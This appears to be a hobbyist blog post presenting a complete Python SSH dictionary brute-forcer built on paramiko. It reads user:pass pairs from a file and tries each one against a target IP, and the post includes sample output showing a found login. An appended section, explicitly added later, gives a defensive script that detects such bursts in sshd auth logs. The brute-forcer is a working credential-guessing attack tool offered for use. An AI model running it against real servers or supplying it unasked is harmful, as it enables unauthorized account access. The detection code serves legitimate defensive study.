So I got bored this evening and decided to write a quick and simple Python SSH bruteforcer (I wanted to learn how to use paramiko).

It takes the dictionary in a user:pass format.

It’s not the most efficient, as it uses a sleep (300ms) function; if I get the time to play, I’ll use some form of thread queuing to ensure that you can throttle the requests. It might also be useful to reattempt SSH connect failures in order to ensure there are no missed attempts.

But here it is anyway:

#!/usr/bin/env python
import paramiko, sys, time, threading

if len(sys.argv) < 3:
    print "Usage: %s IP /path/to/dictionary" % (str(sys.argv[0]))
    print "Example: %s 10.0.0.1 dict.txt" % (str(sys.argv[0]))
    print "Dictionary should be in user:pass format"
    sys.exit(1)

ip=sys.argv[1]; filename=sys.argv[2]

fd = open(filename, "r")

def attempt(IP,UserName,Password):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(IP, username=UserName, password=Password)
    except paramiko.AuthenticationException:
        print '[-] %s:%s fail!' % (UserName, Password)
    else:
        print '[!] %s:%s is CORRECT!' % (UserName, Password)
    ssh.close()
    return

print '[+] Bruteforcing against %s with dictionary %s' % (ip, filename)
for line in fd.readlines():
    username, password = line.strip().split(":")
    t = threading.Thread(target=attempt, args=(ip,username,password))
    t.start()
    time.sleep(0.3)
   
fd.close()
sys.exit(0)

And the running of the code:

user@linux:$ python ssh-dict.py 127.0.0.1 dict
[+] Bruteforcing against 127.0.0.1 with dictionary dict
[-] user:pass fail!
[-] admin:password fail!
[-] guest:password1 fail!
[-] kerry:test fail!
##### SNIP
[-] user5:password6 fail!
[-] user5:password7 fail!
[!] validuser:validpassword is CORRECT!
[-] user5:password8 fail!
##### SNIP
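
The same run seen from the server side, as an added example that is not part of the original post: each attempt above is a separate connection, so the 300ms pacing leaves about three `Failed password` lines per second from one source in the sshd auth log. The sketch below flags that burst and any `Accepted password` that lands inside it. It assumes OpenSSH syslog-format lines; the sample log, the `detect` name, the fixed year and the threshold and window values are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample sshd auth-log lines (not from the original post).
SAMPLE_LOG = """\
Mar  3 21:14:01 host sshd[4101]: Failed password for invalid user user from 127.0.0.1 port 50112 ssh2
Mar  3 21:14:01 host sshd[4103]: Failed password for invalid user admin from 127.0.0.1 port 50114 ssh2
Mar  3 21:14:01 host sshd[4105]: Failed password for invalid user guest from 127.0.0.1 port 50116 ssh2
Mar  3 21:14:02 host sshd[4107]: Failed password for invalid user kerry from 127.0.0.1 port 50118 ssh2
Mar  3 21:14:02 host sshd[4109]: Failed password for user5 from 127.0.0.1 port 50120 ssh2
Mar  3 21:14:02 host sshd[4111]: Failed password for user5 from 127.0.0.1 port 50122 ssh2
Mar  3 21:14:03 host sshd[4113]: Accepted password for validuser from 127.0.0.1 port 50124 ssh2
Mar  3 21:14:03 host sshd[4115]: Failed password for user5 from 127.0.0.1 port 50126 ssh2
Mar  3 21:15:40 host sshd[4200]: Failed password for alice from 192.0.2.10 port 40110 ssh2
Mar  3 21:15:48 host sshd[4200]: Accepted password for alice from 192.0.2.10 port 40110 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+")

def detect(log_text, threshold=5, window=timedelta(seconds=10)):
    """Return per-source stats for IPs with >= threshold failures inside window."""
    recent = defaultdict(deque)  # ip -> failure timestamps still inside the window
    stats = defaultdict(lambda: {"max_burst": 0, "users": set(), "compromised": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year; a fixed one is assumed here.
        ts = datetime.strptime("2000 " + m["ts"], "%Y %b %d %H:%M:%S")
        s, q = stats[m["ip"]], recent[m["ip"]]
        while q and ts - q[0] > window:  # slide the window forward
            q.popleft()
        if m["result"] == "Failed":
            q.append(ts)
            s["users"].add(m["user"])
            s["max_burst"] = max(s["max_burst"], len(q))
        elif len(q) >= threshold:  # a login succeeded in the middle of a burst
            s["compromised"].append(m["user"])
    return {ip: s for ip, s in stats.items() if s["max_burst"] >= threshold}

if __name__ == "__main__":
    for ip, s in detect(SAMPLE_LOG).items():
        print(ip, s["max_burst"], sorted(s["users"]), s["compromised"])
```

A single mistyped password followed by a good login (the `alice` lines) stays below the threshold and is not reported.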
